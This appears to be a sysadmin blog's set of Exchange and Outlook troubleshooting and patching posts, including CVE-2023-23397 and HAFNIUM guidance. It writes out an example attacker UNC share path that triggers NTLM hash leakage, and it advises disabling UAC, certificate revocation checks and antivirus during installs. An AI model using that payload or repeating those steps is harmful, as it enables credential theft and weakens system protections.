CVE-2023-23397 Was ausgenutz wird:

Anstatt Standard Microsoft Outlook Sound kann man für ein meeting reminder einen Custom Sound angeben. Dieser kann auf einem Share liegen. Da liegt der Hund begraben.

https://learn.microsoft.com/de-de/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property

https://www.forbes.com/sites/daveywinder/2023/03/15/microsoft-outlook-warning-critical-new-email-exploit-triggers-automatically-update-now/?sh=47f058ce6e5e

CVE-2023-23397 ist ein Outlook-Bug. Wenn Sie eine eingehende E-Mail für einen Termin mit einer benutzerdefinierten Erinnerung (Ton, Attribut PidLIDReminder) senden, wird Outlook.exe (2012/2016) versuchen, die Sounddatei über SMB abzurufen, sogar von einem externen Share (ohne Berücksichtigung von Sites-Zonen in IE/EDGE/System). Wenn Port 445 zu diesem Ziel geöffnet ist, sendet das System einen NTLM-Hash außerhalb Ihres Netzwerks. Wie wir verstanden haben, können die meisten vorhandenen AV-Lösungen für On-Premise-Exchange derzeit dieses Attribut PidLIDReminder nicht scannen (Trend, Trellix Security für Exchange). Deshalb hat das MS Exchange-Team das Skript bereitgestellt.

Hier kann man für einen TERMIN einen Custom Sound angeben.

Z.B. Alarm "\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"

 PRIO1

besteht darin, das Outlook.exe-Patch zu installieren und die Clients neu zu starten, und auch sicherzustellen, dass Kunden kein SMB für externe Verbindungen öffnen. Dies ist in der Regel ab Client VLAN > WAN geschlossen. Heikel sind Home office, Remote worker welche je nach SPLIT VPN halt 445/SMB offen hätten.

Patches for Outlook 2013/2016:

https://support.microsoft.com/kb/5002254

2016 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202016 (All Outlook 2016 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab (32BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_8d949e375d119c72a375435cd77a4797fb2e0b2b.cab (64BIT)

2013 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202013 (All Outlook 2013 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2cb1193a28972b39546f59d104ae5be489c01d8d.cab (64BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2e7b2f55dcab1fd7d3b00aa1dbd2545fb90e435c.cab (32BIT)

Manuelle Installation. Auspacken der CAB files und DANN Doppelclick auf .MSP Patch file

Deployment ausserhalb WSUS, für die .CAB Files so kann man diese comnmandline installieren:

DISM.EXE für die Office CAB Files scheint nicht zu gehen.

Man kann aber das File aufmachen und dann einfach das MSP File installieren. Windows Installer sucht und findet den Rest. Z.B. die Quelle des Office Files.

msiexec /p c:\edv\ C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qb

msiexec /p c:\edv\ C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qn

DISM.EXE für die Office CAB Files scheint nicht zu gehen.

https://social.technet.microsoft.com/Forums/lync/en-US/683d7d72-b296-419f-b585-becd5d99b37f/dism-offline-update-error-0x80070002

dism /Online /Add-Package /PackagePath:"c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab"

Je nach System gibt dies ein Fehler weil er das darunter notwendige CBS Paket nicht hat:

Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

In der Regel bei anderen CAB Packages sind diese dann mit dabei im CAB/Archiv hier nicht z.B. bei Outlook 2016 auf W11 22H2

Beispiel file dabei von 202X. Da musste man zuerst das SSU installieren und dann den Patch mit DISM.

Bei den jetzigen Outlook Patch aber nur ein MSP mit dabei

2016/W11

The Patch info from WSUS.

PRIO2

Ist FORENSIC, um herauszufinden, ob Sie solche E-Mails erhalten haben und hoffentlich verhindern, dass sie an Outlook.exe geliefert werden. Sie können auch diejenigen reparieren, die bereits angekommen sind. Wenn Sie On-Premise sind, überprüfen Sie, ob Ihre Exchange-AV-Lösung nach dem Attribut suchen kann (An sich ahte die AV Loesung fuer Exchange alle Rechte welche man extra für das laufen lassen des Scripts vergeben muss die Frage ist nur OB Sie mit der aktuellen version das Attribut finden)

Wichitg für PRIO 2 SKRIPT: Wir empfehlen dies nur für Personen, die Erfahrung mit solchen Befehlen haben, z. B. durch Integration einer Archivlösung oder einer mobilen Geräteverwaltungslösung (MDM). Möglicherweise müssen Sie auch mit Ihrem hausinternen Rechts- / Compliance-Team Rücksprache halten, da Sie jemandem vollen Zugriff auf die E-Mails Ihres CEO und Vorstands gewähren, soweit ich verstanden habe (ich habe das Skript nicht im Detail überprüft).

[https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/]

Das Skirpt macht folgendens:

• Generieren Sie eine unbegrenzte (vollständige) Throttle-Richtlinie für eine Gruppe oder einen Benutzer (wie ein MDM-Masterkonto oder ein Konto, das eine rechtliche Archivlösung speist).
• Generieren Sie eine Regel, damit ein Benutzer vollen Zugriff auf jede E-Mail, jeden Kalendereintrag usw. hat, die in der Exchange-Umgebung gespeichert sind (Application Impersonation / https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-...).
• Scannen Sie alle E-Mails oder zumindest einige Tage rückwärts, da die Ukraine im 03/2022 angegriffen wurde, also für ein Jahr? Oder war diese Information falsch? Microsoft sagt hier das man besonders attratkive Targets scannen sollte (Wer sollen diese sein? Der CEO/VR oder nur der User?)

Handlungsbedarf 16.03.2023

Patch installieren und sicher stellen, dass alle den Reboot gemacht haben

Sicher stellen dass Port 445/SMB nach LAN>WAN geschlossen ist (Eventuell anpassen Remote Worker Firewall GPO/Policy oder dann via FW-Module z.B. vom Virenschutz, z.B. Mcafee ENS Firewall)

Die derzeit kursierenden PowerShell-Skripte sind ausschließlich für forensische Zwecke und die Suche nach Indicators of Compromise gedacht. Diese Skripte erfordern jedoch vorsichtiges Handling, da der Skript-User mit vollem Zugriff auf alle Ressourcen ausgestattet werden muss, einschließlich der Möglichkeit, die Geschwindigkeit des Skripts zu regulieren. Bitte führen Sie das Skript daher nicht aus, bis wir sicherstellen können, dass es nicht zu Problemen aufgrund von Sprachbarrieren kommt.

Es ist wichtig zu beachten, dass das PowerShell-Skript nicht notwendig ist, um die Outlook.exe-Sicherheitslücke zu schließen. Es dient ausschließlich der forensischen Untersuchung und dem Ersatz von 1-2% der Kalendereinträge, die aufgrund von Offline-Verbindungen noch nicht aktualisiert wurden. Es ist jedoch unwahrscheinlich, dass diese Skripte erforderlich sind, da die erste Welle des Angriffs durch eine E-Mail mit einem blockierten Anhang (.MSI) erfolgte.

Schließlich ist es wichtig zu betonen, dass der Exchange Patch vom März 2023 keine Auswirkungen auf die Outlook.exe-Sicherheitslücke hat.

Bild: Quelle ACEResponder/Twitter

Bild: Quelle MS, Learn

Guter Blog:

https://practical365.com/cve-2023-23397-ntlm-vulnerability/ (Nicht die Quelle der Info)

Problem: Exchange 2013/2016 Activeync MDM Handy stops syncing, Event 2002, limit max, Targetbackend, will be rejected

In generall this could be a EAS Activesync device running mad or a user using functions like Time to leave on iPhone (See link at end of document here)

It's rather important we find what causes the effect inseatd up just turning up some value. It could also be an attack from outside if you have Outlook Anywhere on WAN open or Activesync open and no reverse Proxy like KEMP or Sophos in front of it. (Don't ask M365 has a Reverse so do it too....)

Search for Event 2002 in Application.

Source: MSExchange Front End HTTP Proxy

EventID: 2002

General: [Eas] The number of outstanding requests for guard TargetBackend("hostex13.brooks.cz") has exceeded the max limit 5000. Current request will be rejected.

From when on did it happen for further analyse:

Search in Logfiles backwards to see when it happend (Last EAS Activesync Sync was done)

Search for text:

"/Microsoft-Server-ActiveSync/default.eas"

In Directory:

C:\inetpub\logs\LogFiles\W3SVC1

C:\inetpub\logs\LogFiles\W3SVC2

Find the last logfile/event and normaly calculate your timezone shift to the time in IIS Date/Time.

09:30 UTC (Logfiles)

09:30 UTC + 2H > 11:30 Local Time Switzerland as example. Give this info to firewall team if you have activesync open from external.

Resolution:

Depending on where this was logged we have to change two parameter hard coded in web.config files. Please first make a backup of the web.config file.

An Cumulative Update may reset this setting worst case so document.

Add or change:

<add key="HttpProxy.ConcurrencyGuards.TargetBackendLimit" value="9000" />

In Directory:

D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\sync

D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\rpc

In File:

web.config

under

<appsettings>

Add or change the value

<add key="HttpProxy.ConcurrencyGuards.TargetBackendLimit" value="5000" />

Or (If it's not enough like with MAD/technical activesync users 150+ devices)

<add key="HttpProxy.ConcurrencyGuards.TargetBackendLimit" value="9000" />

Restart/Recycle follwing APP Pools in IIS Managger.

Check the IIS Logfiles again, yes works again, solved.

References for the absolut crap Apple iPhone function which kills your exchange:

Time to Leave causing unexpected meeting … - Apple Community

https://discussions.apple.com/thread/7905692

Error: This mailbox database is associated with one or more active MailboxExport requests

Source: This means you have current/Pending/stalled as sample PST Exports running (Maybe very old).

Solution: You will have to remove those you are able to remove the emtpy old Exchange MDB.

Get-MailboxExportRequest (ExchangePowerShell) | Microsoft Docs

IF you made (generated/started) the EXPORT as example to .PST Files years ago (Or with a BOT/Batch) they could still exist. Even if the user you USED (admin.stupidelegationgonewrong.d) does not exist anymore.

I reminder for all the Enterprise senior Security Engineer with their different account strategy. Its OK bot never delete an account from IT just disable the account and move into some OU. If some neird/Newbie does not understand the complexcity and want’ss to delete the account just hide them secure in ADS.

You can below that under the domain\domainadminuser account "administrator" you don't even see the POWERSHELL command:

Get-MailboxExportRequest

When you start typing get-Mailboxexp**** and use "Autotype" with TAB it does not come. That is because some exported under an another account. As I understood, you can only see the export under that account.

Re-enable the account and start Powershell with that account as seen below.

With user which has permission you can see the command:

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest

Get-MailboxExportRequest -Status Failed | Remove-MailboxExportRequest

Please also see following post related to move and deletion of default Mailboxes when you want to migrate things:

Butsch.ch | Exchange 2007/2010 Delete default Mailbox Database / remove last Mailbox/SG

Exchange 2010/2013/2016 Migration, problem after DNS-pointing to 2016 structure with some users Outlook.exe

When you thought Kerberos Bloating is way back 2012 it returns. And after some research it is still all over the place. It does affect on premise Solutions as well as cloud solution like ADFS, AZURE etc.

Error:

This error (HTTP 400 Bad Request) means that Internet Explorer was able to connect to the web server, but the webpage could not be found because of a problem with the address.

Reason:

Active Directory User being in member of too many Active Directory groups. Kerberos Ticket Bloating.

Solution:

You can modify a Parameter on the 2010 CAS to allow larger Kerberos Packets to be used for Authentication to Webservices. This may be also valid for other problems where you Authenticator to a Web server solution with Kerberos (Active Directory) as sample: Ticket Systems, Intranet Solutions, SharePoint, Security Appliance etc.

Pro Keyfacts:

You can test the effects by opening the Autodiscover URL in a web browser. Don't handle too much outlook.exe not opening (Because Autodiscover does not work at that moment you want be able)

MS says on the CAS 2010 only. HPE Services once had a KB which said DC and CAS. (Maybe older DC's that time)

Problem:

We have read/heard with number like user ADS-User-Object in 200+ ADS-groups. So at that point we dropped further research and did think this does not affect the customer because he had max 130 Groups a user was in.

But one employee was affected where one user was in only 83 groups and the second user was in 127 groups. There seem to be other Kerberos info which adds to that and hits some limits when the Kerberos packet is proxy back from Exchange 2016 to 2010 and then to the Domain Controller.

You can count the memberships with a 3-liner in PS:

$user=get-aduser m.butsch

$token=(get-aduser $user -Properties tokengroups).tokengroups

$token.count

At the Point where most is setup and you move the Autodiscover SCP DNS to the Exchange 2016 some people are:

• Unable to open Outlook.exe (User still on 2010, Just SCP Point new to 2016)
• Unable to Create New Outlook.exe Profile
• Unable Reach the Autodiscover URL in Web Browser when the DNS Record for that points to the 2016 structure. (https://autodiscover.yourdomain.ch/autodiscover/autodiscover.xml)

The key fact is that you can Test and DEBUG this with by just opening the URL in a web browser. So you don't have to handle around with outlook.exe /rpcdiag. Because you can't open Outlook.exe you are also unable to test Autodiscover with Right on Outlook symbol.

This may be a Pitfall if you had Kerberos Authentication in place and because of that reason FOCUS too much in that direction. If you want to take over Kerberos Authentication from 2010/2016 you may have to build back and then on 2016 build it up again.

This is how the effect shows up on a Client with Outlook 2016.

"Die systemresourcen sind sehr niedrig. Schliessen Sie einige Fenster"

This is how the Outlook Profiles Look after some debug sessions if the effect is there:

To test if the effect is there:

As user > If you open the Autodiscover URL in different Browser you get Error 400

Google Chrome:

Internet Explorer 11 (Because mostly people set PROXY and EXCEPTIONS there and then other Browser import it from that) > which has to be working for Exchange 2013/2016 with Web Proxy active. (you have to exclude all Exchange 2010/2013/2016/2019 FQDN from proxy)

On the Exchange 2016 Server Logfiles you see following error:

"C:\Program Files\Microsoft\Exchange Server\V15\Logging\HttpProxy\Autodiscover\*.log"

Check the SIZE of the logfiles growing as soon as you hand over the DNS for Auto discover from 2010 to 2016 Servers.

On Domain Controllers you may see following just at that time you open the Autodiscover URL in the browser of the client:

You may see following Error from the Exchange 2010 CAS Server on one of your Domain Controller. Check Events under Security for "Event 4769, Audit Failure"

Solution:

Depending on the source where this was offered you may have to adapt that on the:

Exchange 2010 CAS (IIS)

But I found some articles from HPE-IT-Services where it says also on the DC. DO not change it on the DC if the change on the CAS works.

Remember if you have as example several CAS behind a load balancer that the effect is backwards from the Exchange 2016 to the 2010. There is only A little of that process which will go over the front of the Load Balancer (Like KEMP or F5). So you have to patch all CAS.

If am not aware if CAS Server you EXCLUDED from CAS-Serving Service are also affected by this or not.

https://docs.microsoft.com/en-US/exchange/troubleshoot/client-connectivity/400-bad-request

Microsoft says:

On every Exchange 2010 CAS, locate the following subkey:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

Under this subkey, increase the MaxFieldLength and MaxRequestBytes entries by using the values in the following table.

Value name    Value type    Value data    Value base

MaxFieldLength    DWORD    65536  �� Decimal

MaxRequestBytes    DWORD    65536    Decimal

To check if it's working:

Open up https://autodiscover.yourdomain.ch/autodiscover/autodiscover.xml

A Credentials POPUP is fine if not also.

But you have to see the XML File and Error 600 then all is fine.

Find Autodiscover endpoints by using SCP lookup in Exchange | Microsoft Docs

Powershell to check the group membership of all ADS-user to be run on your DC.

Makes a Text Lofile: user_groups.txt

HAFNIUM targeting Exchange Servers with 0-day exploits

Important Exchange Update 03.03.2021 for all Microsoft Exchange Versions

Affected Exchange Version: 2010, 2013, 2013, 2016, 2019

12.03.2021

We have seen so many installations fail on certain blogs and forums. Please make sure understand the update process of patching a special Server like Exchange or SQL-Server. You never patch such system core server application without prior reading a few things.

There is absolute no business justification for an outage in the E-Mail system because someone wanted to patch a leak within a few minutes. Microsoft does its best to put some logic in the patch files. However they are just windows MSP files and the main logic for that is in the Windows installer Module which is on every server or client from MS.

10.03.2021

MS has to build/redo/re-tune their Exchange Repair TechNet/MSDN stuff due the high outage of Exchange on premise. Mostly related to non Exchange Groupware Engineer patching complex Exchange Servers in the emergency.

Repair failed installations of Exchange Cumulative and Security updates - Exchange | Microsoft Docs

https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues

REMINDER: Install any Exchange ROLLUP/ROLLUP with elevated Administrator rights!

1. Select Start, and then type cmd.
2. Right-click Command Prompt from the search results, and then select Run as administrator.
3. If the User Account Control window appears, select the option to open an elevated Command Prompt window, and then select Continue. If the UAC window doesn't appear, continue to the next step.
4. Type the full path of the .msp file for the security update, and then press Enter.
5. After the update installs, restart the server.

REMINDER: Make sure you have SCHEMA ADMIN rights for certain updates (Do not update with least privilege account like admin.butsch or 1stlevelsupportuser1 and if you do pre-heck it has all rights it needs

REMINDER: Most of the modern ROLLUP for Exchange does a) Saves the config to many XML files b) does a complete uninstall of the full EXCHANGE d) Re-installs the full exchange with the settings from XML File (Do no interrupt, Wait until it's done!) If you fail you will see Service deactivated and Exchange missing!

in larger Enterprise and PROXY environments

 Always make sure that you:

 *That the Exchange Server computer has access too all CRT Cert Revocation List address and also Network protocol related to CERTIFICATES (The computer when locked down MUST have access to WAN for these files)

* You DISABLE Cert revocation in Internet Explorer 10/11 or EDGE on the Server (The computer account uses those settings for PROXY or CERT Revocation settings.

* DO disable Temporary cmd.exe > iexplore.exe > Advanced "Check for Server Certi*" < uncheck both and restart Exchange Setup for the ROLLUP/CU

CHECK: https://www.butsch.ch/post/The-certificate-is-invalid-for-exchange-server-usage-Exchange-2010-SANUC.aspx 

CHECK: http://www.computerladen.ch/post/Exchange-2010-SP3-RU282930-ended-prematurely-(Management-Framework-30-on-Server).aspx

Check CERT revocation from Exchange to WAN: If it's not open HIT the Security Engineer in your company who closed internet access for Server and did not understand Cert Revocation. Never lock down Servers if you don't understand what they do fully.

 Microsoft explained with a graph now also since 25% did not understand at first glance. Including everyone I know.

 https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020

Tech Links from 09.03.2011:

https://www.reddit.com/r/sysadmin/comments/m0d98h/exchange_nuked_and_reinstalled_what_can_i_and/

https://blueteamblog.com/microsoft-exchange-zero-days-mitigations-and-detections

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

News coverage done wrong:

Looks like the mainstream security magazines got something wrong here ;-) The patch was releases almost same time as the one from 2013/2016/2019. 2010 was supported and patched last week with a one shot patch already .

CVE we talk about:

CVE-2021-26854

Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.

 CVE-2021-26855

Iis a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

CVE-2021-26857

Is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858

Is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

CVE-2021-27065

Is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

Here is what we talk about:

https://nvd.nist.gov/vuln/detail/CVE-2021-26854

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.swissinfo.ch/ger/alle-news-in-kuerze/microsoft-schliesst-sicherheitsluecken-bei-exchange-software/46415548

https://www.forbes.com/sites/daveywinder/2021/03/03/microsoft-issues-critical-update-warning-as-chinese-hackers-attack-exchange-servers/?sh=5c92a6f17912

Microsoft Made it a little bit complicated today. Here is maybe some help. They adapted their Blogs and documents during the day. First answer to the early links where asking where the patches are they mentioned.

So hopefully this information will help you to get your Exchange on premise safe soon.

 https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b

Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)

To see what version you have use this Powershell commands:

Get-ExchangeServer | Format-List Name,Edition,AdminDisplayVersion

Invoke-Command -ScriptBlock {Get-Command Exsetup.exe | ForEach-Object {$_.FileversionInfo}}

Exchange Version overview:

Exchange Server – Buildnummern und Veröffentlichungstermine | Microsoft Docs

https://docs.microsoft.com/de-de/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

You then see following infos:

ProductVersion FileVersion FileName

14.03.0513.000 14.03.0513.000 D:\Program Files\Microsoft\Exchange Server\V14\bin\ExSetup.exe

This changed AFTER the patch KB5000871 which makes certain Exchange version safe. See the15.1.2106.13. That is the Exchange 2016 CU 18 we patched with the KB5000871.

Screenshot: Sample shows a customer having Exchange 2016 RU 18 (Not already on 19 [Not needed to be safe]) 15.01.2106.002 and we made him safe with the Patch .13. (Lower Line)

IMPORTANT and CONFUSING:

You have to be on a certain Patch level (Not the latest) before you can apply the Hot fix which makes you safe.

• On 2016 and the 2019 the last two regular versions
• On 2010 and 2013 the last version which was released

These versions you can patch with the Hotfix/Security Update for Exchange Server KB5000871

Exchange 2019 you minimum need 2019 CU7 (If you are not on CU7 first update to min CU7).

You don't have to update to CU8 to be safe! Just install the KB5000871 for your correct version.

Exchange Server 2019 CU8    December 15, 2020    15.2.792.3        15.02.0792.003

https://www.microsoft.com/en-us/download/details.aspx?id=102770 (KB5000871 Download link)

Exchange Server 2019 CU7    September 15, 2020    15.2.721.2        15.02.0721.002

https://www.microsoft.com/en-us/download/details.aspx?id=102771 (KB5000871 Download link)

If your are not CU7 or CU8 then install one of those first and then the KB5000871 afterwards to be safe.

Check if you need Enterprise Admin/Schema Admin to install CU7 and CU8 (Don't install with delegated Admin accounts!)

Reminder: Most of the modern ROLLUP for Exchange does a) Saves the config to many XML files b) does a complete uninstall of the full EXCHANGE d) Re-installs the full exchange with the settings from XML File (Do no interrupt, Wait until it's done!) If you fail you will see Service deactivated and Exchange missing!

Exchange 2016 you Minimum need 2016 CU18 (If you are not on CU18 first update to min CU18).

You don't have to update to CU19 to be safe! Just install the KB5000871 for your correct version.

Exchange Server 2016 CU19 15. Dezember 2020 15.1.2176.2     15.01.2176.002

https://www.microsoft.com/en-us/download/details.aspx?id=102772 (KB5000871 Download link)

Exchange Server 2016 CU18 15. September 2020 15.1.2106.2     15.01.2106.002

https://www.microsoft.com/en-us/download/details.aspx?id=102773 (KB5000871 Download link)

If your are not CU18 or CU19 then install one of those first and then the KB5000871 afterwards to be safe.

Both CU19 may make Active Directory Schema Updates so need be Domain Admin and Enterprise/Schema Admin! The patch can be installed with regular permission.

Reminder: Most of the modern ROLLUP for Exchange does a) Saves the config to many XML files b) does a complete uninstall of the full EXCHANGE d) Re-installs the full exchange with the settings from XML File (Do no interrupt, Wait until it's done!) If you fail you will see Service deactivated and Exchange missing!

Exchange 2013 There is only one hot fix for the Patch which came out a year ago.

Exchange Server 2013 CU23    June 18, 2019        15.0.1497.2        15.00.1497.002

https://www.microsoft.com/en-us/download/details.aspx?id=102775 (KB5000871 Download link)

If you are not on 23 install the CU23 first and then the KB5000871 afterwards to be safe.

Reminder: Most of the modern ROLLUP for Exchange does a) Saves the config to many XML files b) does a complete uninstall of the d) Re-installs the full exchange with the settings from XML File (Do no interrupt, Wait until it's done!)

Exchange 2010 There is new Rollup 32 free to all customers. Install the RU32 and you are good. That came out today and includes all you need.

 Exchange Server 2010 SP3 Rollup 32 (Release today 03.03.2021 you can install without ESU)

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459

 https://www.microsoft.com/en-us/download/details.aspx?id=102774 (KB5000871 Download link)

Install the MSP patch and the CU/ROLLUP the right way so you see more info.

* Check Execution Policy Powrshell angepasst? get-executionpolicy –list

* Check UAC OFF

* Run it elevated or it will not work

* Stop Schedule things like Backup, Snapshot from Netapp, Veeam Tasks maybe Antivirus Solution

* Make a link to cmd.exe on your Desktop and run that Elevated

* From that cmd.exe navigate to the Patch and run as example Exchange2016-KB5000871-x64-de.msp /lvx C:\KB5000871_InstallationLogFile.log

Or with a batch. Same thing it's important that you install the Patch only elevated with run as Administrator.

:: ExchangeServer2016-x64-CU18_HOTFIX

:: V1.0, 03.03.2021, M. Butsch, First Release

:: -----------------------------------------------------------------------------------------------------------------------

cls

@echo off

echo ACHTUNG auf GPO's fuer Powershell oder UAC ACHTUNG

echo -----------------------------------------------------------------------

echo - Execution Policy Powrshell angepasst? get-executionpolicy -list

echo - revoke Cert IE angepasst?

echo - UAC abgestellt

echo -----------------------------------------------------------------------

pause

C:\edv\ExchangeServer2016-x64-CU18_HOTFIX\Exchange2016-KB5000871-x64-de.msp /lvx C:\edv\ExchangeServer2016-x64-CU18_HOTFIX\KB5000871_InstallationLogFile.log

pause

Error: "Exchange OWA HTTP500 Internal Server Error" after OWA logon

You see the Logon Screen from Exchange OWA. You Logon with valid Credentials. After Logon you receive a Website error:

Solution/Reason/Source: Service "Microsoft Exchange Forms-Based-Authentication Service is not started or crashed.

This was hard to find since behind a KEMP and during a 2010-2016 Migration. But indeed very simple. The Service "Microsoft Exchange Forms-Based-Authentication Service" was not started on one CAS behind the KEMP Load Balancer. Depending on the complexity of your KEMP checks the NLB fails over to the other CAS or not.

When you search for Routes, Cipher and everything you seem to forget simple things like services.

We found a lot of blogs which mentioned that this was solved and related to the fact the VM running the CAS having too low RAM memory. Either check all Services after Reboot with Scripts or give more RAM. ;-)

If this does not solve it please also see:

Exchange 2013 Troubleshooting: Error 500 when login ECP and OWA - TechNet Articles - United States (English) - TechNet Wiki (microsoft.com)

https://social.technet.microsoft.com/wiki/contents/articles/34020.exchange-2013-troubleshooting-error-500-when-login-ecp-and-owa.aspx

Recycle APP Pool in IIS

OR

1. Go to the RUN window and type "ADSIEDIT.msc"
2. After opening ADSIEDIT, go to the Action navigation. Connect to and then navigate to
   1. "Select a Well known Naming Context"
3. Select Configuration and select OK.
4. Go to CN=Configuration then CN=Services then CN=Microsoft Exchange then CN=Your DOMAIN Name and navigate to CN-Client Access
5. Right-click 【CN=Client Access】and click Properties. Scroll down to look for values:
   1. msExchCanaryData0
   2. msExchCanaryData1
   3. msExchCanaryData2
   4. msExchCanaryData3
6. Take a backup to be safe and clear all these values to<not set>. If Values are already set to <not set> then try to do Solution 1.
7. Open IIS Manager on your CAS server, go to "Application Pools", right-click MSExchangeOWAAppPool and click Recycle.

   

Server 2008R2, Exchange 2010 SP3, ROLLUP 27 installed, 2x DAG Mailbox Server (Netapp Snap Manager for Exchange 7.2.1), CAS-Servers all went fine to Upgrade to RU30

This KB is all about a built in Exchange 2010 Powershell Script from Microsoft where they complain or wonder about Powershell from Microsoft. A finally statement has following comment:

"Curious PS behavior: It appears that 'return' trumps 'throw', so don't return..."

What we try to do:

We install RU28/29 or 30 on Exchange 2010 SP3 with some "World famous" Netapp Software for Exchange Backup SnapManager or some Netapp Partner tool.

Because it's "Freaky" the Netapp people install Microsoft Management Framework 3.0 or 4.0. So they have a little plug-in somewhere or can freak around with Power shell to show off their skills to other people. Because their football field size compatibility matrix shows they have to upgrade they update.

So the real problem is the Management Framework 3.0 or 4.0 installed by some Netapp Software or a partner plugin from a Netapp company.

This is what happens:

Regular approved setup, elevated, services no needed Stopped, Execution Policy Unsigned.

Event 1023, Msiinstaller, Application, Update Rollup

As always you did check:

• The account you update is not some lockdown crap admin.s admin.c User which has no Schema, ADS-permission
• Set-executionpolicy unrestricted
• Disabled Cert Revocation Check in IE/EDGE > Options
• Make a cmd.exe on Desktop run that ELEVATED (Run as Administartor)
• Shortly disable AV even if it's Mcafee ENS ;-)

But that was not the error here….

Try to re-run it with debug option so you see more:

D:\edv\RU30\Exchange2010-KB4536989-x64-en.msp /lvx D:\edv\RU30\RU30_InstallationLogFile.log

Also check everything under C:\ExchangeSetupLogs\*.log

Logfile Debug:

Solution 1:

Microsoft recommends to UNINSTALL Management Framework 3.0 or 4.0 > Install the Rollup > RE-Install Management Framework 3.0 or 4.0 and pray.

Solution 2:

Just give the Service Pack RU (The Powershell) what it wants. A return value $success. ;-) As you can guess not official supported says the guy who wrote the comments in the PS code? It's really in the beginning when the Rollup checks Services, Checks that Powershell runs etc.

Backup the file then Modify file ManageScheduledTask.ps1 from "D:\Program Files\Microsoft\Exchange Server\V14\Scripts" Line 462.

Change line 462 from "Return $success" To "# Return $success"

Just put the # and a space in front of it (Exclude)

OR this worked too….

Change line: "Return $success" to "Write-Output $success"

The comments speaks for their self in this Microsoft Script. Microsoft about Microsoft ;-)

How to turn off Autodiscover Warning in Outlook 2010/2013/2016/2019 (Exchange 2010/2013/2016)

Warnung: Das Konto wurde fuer die Einstellung auf die Website umgeleitet

https://support.microsoft.com/en-us/help/2480582/how-to-suppress-the-autodiscover-redirect-warning-in-outlook

A little bit more explained than in the Microsoft KB and with a check THAT if you ONLY set the Registry key if the OFFICE Version is installed. During Migrations you could otherwise run into trouble if this key re-applies just the time you migrate to next office version.

This after you done Split DNS and integrated Autodiscover like you should.

http://www.butsch.ch/post/Exchange-200720102013-with-SPLIT-DNS-and-ONE-single-Certificate.aspx

We have:

Autodiscover.butsch.ch    (Exchange Server Autodiscover DNS entries)

mail.butsch.ch (Exchange Server)

This is what we don't want:

Make a new GPO policy.

Erstellen neue GPO:

Registry Keys:

"Software\Microsoft\Office\14.0\Outlook\AutoDiscover\RedirectServers" (Office 2010)

"Software\Microsoft\Office\15.0\Outlook\AutoDiscover\RedirectServers" (Office 2013)

"Software\Microsoft\Office\16.0\Outlook\AutoDiscover\RedirectServers" (Office 2016)

Office 97 - 7.0

Office 98 - 8.0

Office 2000 - 9.0

Office XP - 10.0

Office 2003 - 11.0

Office 2007 - 12.0

Office 2010 - 14.0 (sic!)

Office 2013 - 15.0

Office 2016 - 16.0

Office 2019 - 16.0 (sic!)

EPO integrated McAfee Security for Exchange 8.6 SP2

If you have a fully integrated Mcafee Security for Exchange which you manage the POLICY and SETTINGS from the EPO (Not on the Exchange itself)

you may see an error in the GUI where it says "Your Anti-Virus DAT may be out of DATE".

That is just the warning if check the DAT it's fine and up to date.

DAT Update Button in GUI on Exchange itself does not seem to update

